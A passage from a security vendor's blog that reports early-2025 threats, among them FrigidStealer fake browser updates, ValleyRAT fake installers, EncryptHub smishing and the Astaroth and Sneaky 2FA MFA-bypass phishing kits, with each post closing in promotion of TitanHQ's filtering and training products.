server, and the user is redirected to the real login page for that service, most\r\nlikely unaware that they have been phished. The phishing campaign was identified by InfoBlox, which identified\r\nthousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, since then the\r\nnumber of brands being impersonated has increased considerably, with support also provided to target users in\r\nseveral languages.\r\nThe phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the\r\neffectiveness of their campaigns. Businesses should respond to the evolving threat landscape by adopting a\r\ndefense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering\r\nsoftware such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce\r\nto raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.\r\nFake Browser Update Campaign Delivers FrigidStealer Malware to Mac Users\r\nby G Hunt | March 4, 2025 | Phishing \u0026 Email Spam, Spam Software, Website Filtering\r\nThere has been a surge in infostealer malware infections, with detections up almost 60% from the previous year.\r\nInfostealers gather system information, stored files, and sensitive data and exfiltrate the information to their\r\ncommand and control server. Once installed, they can remain undetected for long periods of time, exfiltrating\r\nsensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking\r\nscreenshots and capturing audio and video by taking control of the microphone and webcam.\r\nThe majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer\r\nhas been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies,\r\npassword-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet\r\ncredentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from\r\nthe user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home\r\ndirectory and is exfiltrated to its command and control server.\r\nThe threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates\r\non compromised websites. The threat actor injects malicious JavaScript into the HTML of the webpage which\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 12 of 136\n\ngenerates a fake browser update notification to website visitors. The notifications warn the user that they must\r\nupdate their browser to continue to view the page, with the displayed notification tailored to the browser in use.\r\nThe notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain\r\nan update button that the user must click to proceed. Clicking the button will trigger the download of an installer\r\n(DMG file), which must be manually launched. The user is required to enter their password to get around macOS\r\nGatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.\r\nA similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques,\r\nalthough it tricks the user into downloading and executing an MSI installer, which delivers one of two different\r\ninfo stealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way,\r\ndelivering an APK file that contains the Marcher banking Trojan.\r\nWith infostealer infections soaring, businesses need to make sure they have the right security solutions in place\r\nand should be providing regular security awareness training to the workforce. Employees should be instructed to\r\nnever download browser updates when prompted to do so on websites or run any suggested commands on their\r\ndevices, as the updates and commands are likely to be malicious.\r\nA web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious\r\nwebsites. The WebTitan DNS filter can used to protect users on or off the network and is constantly updated with\r\nthreat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that\r\nattempt will be blocked. The web filter can also be configured to block file downloads from the internet by file\r\ntype, allowing IT teams to prevent employees from downloading executable files.\r\nWhile this is a web-based campaign, information stealers are commonly distributed in phishing emails, either\r\nthrough malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a\r\npowerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities.\r\nSpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing\r\nemails and 100% of malware.\r\nThat Google Chrome Installer May be Malware!\r\nby G Hunt | February 28, 2025 | Security Awareness, Website Filtering\r\nA China-based ransomware group, Silver Fox, that has primarily targeted individuals in China, Taiwan, and Hong\r\nKong, has been expanding its attacks outside of those regions and is now conducting attacks more broadly on\r\nmultiple industry sectors. Silver Fox uses ransomware in its attacks and is focused on file encryption, demanding\r\npayment to obtain the keys to decrypt files. While the group does engage in double extortion tactics, stealing data\r\nand threatening to leak that data if the ransom is not paid, data theft is limited. Highly sensitive data is not\r\ngenerally stolen.\r\nMany ransomware groups breach networks and spend time moving laterally to infect the maximum number of\r\ndevices possible and also spend time locating sensitive data to exfiltrate. It is often the data theft and threat of\r\npublication that is the main driver behind ransom payments, so much so that some ransomware groups have\r\nabandoned the file encryption element of their attacks. In contrast, Silver Fox is focused on quick attacks, often\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 13 of 136\n\nbreaching networks and encrypting files on the same day. The group even abandons attacks if lateral movement is\r\nnot possible or if strengthened security is encountered.\r\nSilver Fox primarily gains initial access to victims’ networks by deploying a remote access Trojan called\r\nValleyRAT. ValleyRAT was first identified in 2023 and is believed to be a malware tool developed by Silver Fox,\r\nand its function is to give Silver Fox remote access to networks. The group has extensively targeted individuals in\r\naccounting, finance, and sales since those employees are likely to have access to sensitive data that can be quickly\r\nand easily stolen.\r\nValleyRAT is delivered by multiple means, indicating Silver Fox is trying to infect as many users as possible. One\r\nof the main methods used for distribution is fake installers for popular software. For instance, the group has been\r\nobserved using fake installers for EmEditor (a Windows text editor), DICOM software (for viewing medical\r\nimages), and system drivers and utilities. The group has also been observed using a spoofed website offering the\r\nGoogle Chrome browser, which prompts the user to download a ZIP file containing a Setup.exe file, which installs\r\nValleyRAT.\r\nThe methods used to drive traffic to these fake downloads are unclear, although traffic to the fake Google Chrome\r\ndownload site is thought to be generated through malvertising and SEO poisoning, where malicious adverts are\r\ndisplayed for key search terms related to Chrome and web browsers that redirect users to the drive-by download\r\nsite. SEO poisoning may be used, where black hat SEO techniques are used to get web pages to appear in the\r\nsearch engine listings for key search terms. If the user is tricked into executing the fake installer, they will be\r\ninfected with ValleyRAT and a ransomware attack will rapidly follow.\r\nSince the group is focused on rapid attacks involving minimal effort, the best defense is to strengthen baseline\r\nsecurity and make lateral movement difficult through network segmentation. To prevent ValleyRAT downloads,\r\nweb security needs to be improved to block attempts by users to visit the malicious websites. A web filter is an\r\nideal tool for blocking access, including redirects through malvertising and SEO poisoning. A web filter such as\r\nWebTitan can also be configured to block downloads of certain files from the Internet and restrict access to\r\nwebsites by category – software download sites for example. Ongoing (and regular) security awareness training is\r\nalso vital to teach employees about the risk of downloading software from the Internet, raise awareness of\r\nphishing, and teach security best practices, adding an important human layer to your security defenses.\r\nTitanHQ’s web filter, WebTitan, is easy to implement and use, is automatically updated with the latest threat\r\nintelligence, and provides exceptional protection against web-based threats. When coupled with the SafeTitan\r\nsecurity awareness training and phishing simulation platform, businesses will be well protected against ValleyRAT\r\nmalware and other web-delivered malware payloads. Give the TitanHQ team a call to discuss these and other\r\ncybersecurity solutions to better protect you against the growing malware threat.\r\nResearchers Confirm Massive Threat From Information Stealing Malware\r\nby G Hunt | February 27, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam Software\r\nCybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical\r\ninfrastructure, and while these attacks often make headline news and cause massive disruption, there is a much\r\nmore common malware threat – Information stealers.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 14 of 136\n\nInformation stealers are malware that is silently installed on devices that can remain undetected for long periods of\r\ntime. These types of malware have many different capabilities and can serve as downloaders for other malicious\r\npayloads, but their main function is information theft. Information theft is achieved in several ways, depending on\r\nthe malware variant in question. These malware types often have keylogging capabilities and can record\r\nkeystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords\r\nto be captured. They can often record audio from the microphone, take control of the webcam and record video,\r\nand take screenshots. They can also steal browser histories, cookies, and other sensitive information.\r\nThe information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and\r\nsteal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud.\r\nInformation stealers can also provide a threat actor with access to a device, and that access is often sold to\r\nspecialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers,\r\nusing information stealers to gain access before selling that access to other cybercriminal groups.\r\nInformation stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in\r\nrecent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a\r\nreport from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers\r\nare being shared on cybercrime forums. The credential lists included billions of logins that had been captured from\r\ninfected devices, which, according to KELA, included around 4.3 million devices, of which around 330 million\r\ncredentials had been stolen. An estimated 40% were corporate credentials.\r\nThe breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised\r\naccounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN\r\nTXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs\r\nincluded 23 billion rows of data with 493 million unique website and email address pairs and around 284 million\r\nunique email addresses. Hunt said 244 million passwords were not previously known to the HIBP service, with\r\n199 million already in its database.\r\nThe extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the\r\nimportance of advanced malware protection and the sheer number of compromised credentials suggests many\r\nbusinesses have been infected with information stealers. The problem for businesses is that these malware variants\r\ncan be difficult to identify, as new versions are constantly being released. Traditional antivirus software is\r\nsignature-based, which means it can only detect known malware. When new malware is identified, a signature of\r\nthat malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition\r\nlist, it will not be detected. There are several ways that these information stealers are distributed, with email being\r\none of the most common. They can also be downloaded from the internet from malicious websites in drive-by\r\ndownloads or installed along with pirated software or doctored versions of legitimate software installers.\r\nDefending against information stealers requires a combination of measures – a defense-in-depth approach, with\r\nmultiple overlapping layers of security. Given the high volume of infections stemming from email, businesses\r\nneed a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an\r\nantispam server must have advanced antimalware defenses. That means traditional signature-based detection and\r\nadvanced behavioral detection to ensure previously unseen malware is identified and blocked.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 15 of 136\n\nSpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for\r\nbehavioral analysis. If standard checks are passed, suspicious messages are sent to the sandbox – a safe\r\nenvironment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and\r\nin recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100%\r\nmalware detection rate.\r\nSecurity awareness training needs to be provided to the workforce to ensure that employees have the skills to\r\nrecognize and avoid threats, no matter where they are encountered. Through training, employees should be\r\nconditioned to always report potential threats to their security team, and businesses can promote security best\r\npractices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing\r\nsimulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security\r\nawareness.\r\nMany malware infections occur via the Internet, and while training can reduce risk, a technical security solution is\r\nrequired to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious\r\nwebsites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and\r\nrestrict the sites and web pages employees can access.\r\nWith these three security solutions in your arsenal, you will be able to significantly improve your security posture\r\nand block information stealers and other threats. Give the TitanHQ team a call today to find out more or take\r\nadvantage of a free trial of these solutions.\r\nSmishing and Vishing Used by Ransomware Group for Initial Access to Corporate\r\nNetworks\r\nby G Hunt | February 26, 2025 | Phishing \u0026 Email Spam, Security Awareness, Website Filtering\r\nA ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the\r\nnetworks of more than 600 organizations worldwide. EncryptHub has been active since June 2024 and gains\r\ninitial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather\r\nthan email.\r\nThe group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco\r\nAnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via\r\npersonalized SMS messages (smishing) or the phone (vishing).\r\nIf vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk\r\nand uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is\r\nspoofed to make it appear that the call is coming from inside the company or Microsoft Teams phone numbers are\r\nused. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam\r\nworks, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that\r\ncompany. If the user enters their credentials, they are used in real-time to log in, and if there are any multifactor\r\nauthentication prompts, the threat actor is able to obtain them on the call. After successfully gaining access, the\r\nuser is redirected to the genuine login page for their VPN, and the call is terminated.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 16 of 136\n\nAnother tactic used by the group involves SMS messages with a fake Microsoft Teams link with the goal of\r\ncapturing their Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the\r\nthreat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords,\r\nwhile the user believes they are interacting with the legitimate Microsoft service. Once access is gained, the group\r\nuses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware\r\npayload, and issues a ransom demand.\r\nThe group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial\r\ncontact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the\r\nworkforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s\r\nweb filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat\r\nintelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any\r\nattempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a\r\nlocally hosted block page.\r\nRegular security awareness training for the workforce is vital to teach security best practices and raise awareness\r\nof the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training\r\nplatform, businesses can easily create training programs tailored for individuals, roles, and departments, and\r\nautomate those campaigns so they run continuously throughout the year, delivering training in small chunks on a\r\nweekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to\r\nincrease awareness of specific threats. The platform also includes a phishing simulator for running phishing\r\nsimulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed,\r\ntraining is automatically delivered to the user in real time, relevant to the threat they failed to identify. This\r\nensures training is delivered at the point when it is likely to be most effective.\r\nFor more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security\r\nawareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to\r\nallow you to assess them fully before making a purchase decision.\r\nCracked Software Used to Deliver Information Stealing Malware\r\nby G Hunt | February 20, 2025 | Phishing \u0026 Email Spam\r\nInformation stealers are one of the most common ways that initial access is gained to business networks, and the\r\nextent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million\r\ncomputers have been compromised using information stealers in the past few years and Check Point reports that\r\ninfections have increased by 58% in the past year.\r\nCybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data\r\nsuch as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the\r\ncybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that\r\nthey work with have their own specialisms, such as conducting ransomware attacks. These malware variants are\r\ncapable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files,\r\nobtain web browser data and passwords, and steal cryptocurrency extensions. Infection with an information stealer\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 17 of 136\n\ncan result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware\r\ninfections.\r\nSecurity researchers have recently uncovered a new campaign that distributes information stealers such as Lumma\r\nand ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free\r\nof charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The\r\ninstallers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning\r\nto get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad\r\nnetworks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to\r\ndownload sites.  Initial contact is also made via email, with workers tricked into opening malicious files that\r\nlaunch scripts that deliver the information stealer payload or direct users to websites where the malware is\r\ndownloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the\r\ncriminals impersonating IT helpdesk staff and tricking employees into downloading the malware.\r\nDefending against information stealers means improving defenses against all these tactics, and that means there is\r\nno single cybersecurity solution or measure that will be effective against them all, but there are three important\r\ncybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security\r\nawareness training.\r\nAnti-spam Software\r\nMany malware infections occur via email, either through attachments containing malicious scripts or via\r\nhyperlinks to websites from which malware is downloaded. When malicious attachments are used, they are not\r\nalways detected by antispam software and can easily reach end users. To improve detection, email sandboxing is\r\nrequired, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed\r\nto identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined and\r\nare not deleted.\r\nA DNS Filter\r\nSince many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads\r\nfrom the internet, and assess web content in real-time for malicious content, without the latency associated with\r\nother types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce\r\nreliance on employees recognizing and avoiding threats.\r\nSecurity Awareness Training\r\nAnti-spam software and DNS filters will greatly improve security; however, employee security awareness also\r\nneeds to be improved. Through regular security awareness training, businesses can eliminate risky practices and\r\ntrain employees how to recognize and avoid threats. By providing training continuously in small chunks\r\nthroughout the year, businesses can develop a security culture and significantly improve their human defenses.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 18 of 136\n\nTitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs)\r\nthat are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering\r\nservice, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution.\r\nAll three solutions are available on a free trial to allow you to see for yourself the difference they make before\r\nmaking a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take\r\nthe important first step toward improving your defenses.\r\nNew Phishing Kit Bypasses MFA in Real-Time\r\nby G Hunt | February 18, 2025 | Phishing \u0026 Email Spam\r\nA growing number of businesses are implementing multi-factor authentication to add an extra layer of security\r\nand improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized\r\nindividuals from accessing accounts using compromised credentials, MFA does not provide total protection.\r\nSeveral phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new\r\nphishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through\r\nsession hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and\r\nMicrosoft 365 accounts.\r\nThe Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the\r\nEvilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the\r\nlegitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an\r\nadversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies,\r\nthereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the\r\ncybercriminal to instantly access the user’s account.\r\nThe user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the\r\nuser is directed to a server and is presented with what appears to be a legitimate login page. The page has valid\r\nSSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username\r\nand password are entered, they are captured and forwarded to the legitimate authentication service in real time.\r\nThe cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram,\r\nand the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted\r\nas they are entered by the user. When session cookies are generated, they are immediately hijacked and injected\r\ninto the attacker’s browser, which means the attacker can impersonate the genuine user without needing their\r\nusername, password, or 2FA token, since the session has already been authenticated. The kit also includes\r\nbulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before\r\nthe user suspects anything untoward has happened.\r\nPhishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so\r\nimportant to have effective anti-spam software, capable of identifying and blocking the initial phishing emails.\r\nSpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use,\r\nexceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution\r\ndeveloped from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 19 of 136\n\noutperformed all other tested email security solutions, achieving the highest overall score thanks to a 100%\r\nmalware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The\r\nexceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing\r\nattempts, and email sandboxing to detect and block malware and zero-day threats.\r\nIn addition to an advanced spam filtering service, businesses should ensure they provide regular security\r\nawareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is\r\nan easy-to-use security awareness training platform that makes it easy to create effective training courses and\r\nautomate the delivery of training content. The platform also includes a phishing simulator with an extensive\r\nlibrary of phishing templates that makes it easy to create and automate phishing simulations, generating relevant\r\ntraining automatically if a user is tricked. That means training is delivered at the point when it is likely to be most\r\neffective at correcting behavior.\r\nGive the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and\r\nSafeTitan products, like all TitanHQ solutions, are also available on a free trial.\r\nPhishing Campaign Targets European and American Corporate Facebook\r\nAccounts\r\nby G Hunt | February 16, 2025 | Security Awareness, Spam Software\r\nA phishing campaign has been identified that targets corporate Facebook credentials and has so far involved more\r\nthan 12,000 messages to users worldwide. The campaign has primarily targeted enterprises in the European Union\r\n(45.5%), United States (45%), and Australia (9.5%) with the phishing emails sent using a legitimate Salesforce\r\nautomated mailing service. When emails are sent via this service, a sender email address can be specified;\r\nhowever, if no address is supplied, the emails appear to have been sent directly from Salesforce from the\r\nnoreply@salesforce.com email address, per the terms of service. As such, any recipient of the email may\r\nmistakenly believe that the emails are official.\r\nThe emails include fake versions of the Facebook logo, which recipients should be able to identify as fake;\r\nhowever, the emails are well-written, and the subject matter is sufficiently concerning to warrant a click. The\r\nemails warn the recipient about a copyright infringement claim that has been filed under the Digital Millennium\r\nCopyright Act (DMCA) against the user’s personal account, indicating material has been shared via their account\r\nthat is in violation of copyright laws.\r\nThe messages include the date of the complaint, that it was reported by Universal Music Group, and is due to the\r\nunauthorized use of copyrighted music. The recipient is told they must respond to the claim by the close of\r\nbusiness if they wish to contest the claim. The date of the required response is only 24 hours after the complaint\r\ndate, therefore an immediate response is required. As is common with phishing attempts, there is a threat –\r\npermanent restrictions on the user’s Facebook account. The message includes a button to click to contest the\r\nclaim, but rather than direct the user to a login page, they are directed to a fake support page, where they are\r\nprovided with further information on the restrictions that have or will be applied. Several variations of that email\r\nhave been identified, including warnings that Facebook surveillance systems have identified a copyright issue and,\r\nas a result, limitations have been placed on the user’s account.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 20 of 136\n\nThose restrictions include the disabling of personal ad accounts and audiences, blocking the management of\r\nadvertising assets or people for businesses, and preventing the user from creating or running ads and managing ad\r\naccounts. In order to have those restrictions removed, the user must click the button to request a review, which\r\ndirects the user to a spoofed Facebook login page. If credentials are entered, they will be captured and used to log\r\nin to the user’s account. The campaign, identified by Check Point Research, targets business users, many of whom\r\nwill rely on Facebook for advertising and customer contact, therefore the consequences of an account restriction\r\ncould be serious, and certainly serious enough to warrant filing an appeal.  What is unclear is how the threat actor\r\nuses the compromised accounts. Potentially they could be used for further scams, which could cause considerable\r\nreputational damage to the business.\r\nProtecting against these types of phishing campaigns requires a combination of email security and user awareness.\r\nAn email security solution can prevent these messages from reaching inboxes, thus neutralizing the threat, but\r\nsecurity awareness training should also be provided to workforce members to help them identify and avoid\r\nphishing attempts. In this case, Facebook admins for the business should be warned about the campaign and\r\ninstructed to log in to Facebook directly via their web browser if they receive any copyright infringement notices\r\npurporting to have been sent by Facebook. If there is a problem with their account, it will be apparent when login\r\ninto their account.\r\nWith the SafeTitan security awareness training platform from TitanHQ, it is easy to create and automate security\r\nawareness training programs and roll out new training content in relation to specific threats, only providing that\r\ntraining to the individuals who are likely to be targeted. Phishing simulations can easily be created to test\r\nawareness of these phishing scams, with relevant training automatically delivered in response to clicks on\r\nphishing emails.\r\nTitanHQ’s anti-spam software, SpamTitan, provides excellent protection against phishing, as demonstrated by\r\nrecent tests by VirusBulletin. The cloud-based anti-spam service outperformed all other antispam solutions in the\r\nlatest round of tests, blocking 100% of phishing emails and 100% of malware, earning SpamTitan the top spot for\r\noverall score. If you are not happy with your anti-phishing defenses or feel you are paying too much for\r\nprotection, give the TitanHQ team a call and ask about SpamTitan. If you have yet to provide regular security\r\nawareness training to your workforce, why not sign up for a free trial of Safetitan and put the product to the test on\r\nyour workforce?\r\nEmail Bombing: What You Need to Know to Protect Your Business\r\nby G Hunt | February 3, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam Software\r\nInvestigations of cyberattacks have identified an increasing number of incidents that started with email bombing.\r\nA high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting\r\na malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email\r\nbombing is now being used to increase the effectiveness of phishing campaigns.\r\nWith email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding a\r\nuser to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam issue\r\nthen impersonates a member of the IT department and claims they can fix the problem, with content often made\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 21 of 136\n\nvia a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and\r\ngranting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s\r\ndevice during the remote access session. What starts with an email bombing attack often ends with a ransomware\r\nattack.\r\nThere are several measures that you should consider implementing to prevent these attacks. If you use Microsoft\r\nTeams, consider restricting calls and messages from external organizations, unless there is a legitimate need to\r\naccept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The\r\nuse of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent\r\nthe installation of these tools, including using a web filter to block downloads of these tools (and other\r\nexecutables) from the Internet.\r\nAn spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as\r\nSpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails,\r\nalong with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at\r\nVirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails,\r\nand 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam\r\nsoftware under test.\r\nBusinesses should not underestimate the importance of security awareness training and phishing simulations.\r\nRegular security awareness training should be provided to all members of the workforce to raise awareness of the\r\ntactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social\r\nengineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security\r\nawareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For\r\nmore information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed\r\nservice providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity\r\nsolutions.\r\nMicrosoft 365 Accounts Targeted Using Sneaky 2FA Phishing Kit\r\nby G Hunt | January 31, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam News\r\nAs the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor\r\nauthentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a\r\nCitrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information\r\nof 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost\r\nChange Healthcare an estimated $2.9 billion last year.\r\nThe attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity\r\nmeasure – If passwords are compromised, access to accounts can be prevented. Unfortunately, multifactor\r\nauthentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of\r\nintercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages\r\noffered to cybercriminals that cover all aspects of phishing. If purchased, phishing campaigns can be conducted\r\nwith minimal effort as the phishing kit will generate copies of websites that impersonate well-known brands, the\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 22 of 136\n\ninfrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is\r\nto supply the email addresses for the campaign, which can be easily purchased on hacking forums.\r\nSome of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting\r\nMicrosoft 365 and Gmail session cookies, which are used to circumvent MFA access controls during subsequent\r\nauthentication. One of the latest phishing kits to be identified is has been dubbed Sneaky 2FA. The kit was first\r\nidentified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity\r\nfirm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA\r\nphishing kit.\r\nAs with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing\r\npage. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient\r\ninto opening a PDF file attachment that has a QR code directing the user to a Sneaky 2FA page on a compromised\r\nwebsite, usually a compromised WordPress site. These pages have a blurred background and a login prompt.\r\nMicrosoft 365 credentials are required to access the blurred content. The phishing pages automatically add the\r\nuser’s email address to the login prompt, so they are only required to enter their password. To evade detection,\r\nmultiple measures are employed such as traffic filtering, Cloudfire Turnstile challenges, and CAPTCHA checks.\r\nMany phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles\r\ncommunications with Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the\r\nauthentication steps. When the password is entered, the user is directed to the next page, and the victim’s email\r\naddress and password are sent to the phishing server via an HTTP Post. The server responds with the 2FA method\r\nfor the victim’s account and the response is sent to the phishing server. The phishing kit allows session cookies to\r\nbe harvested that provide account access, regardless of the 2FA method – Microsoft Authenticator, one-time\r\npassword code, or SMS verification.\r\nPhishing kits such as Sneaky FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA;\r\nhowever, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric\r\nauthentication. The 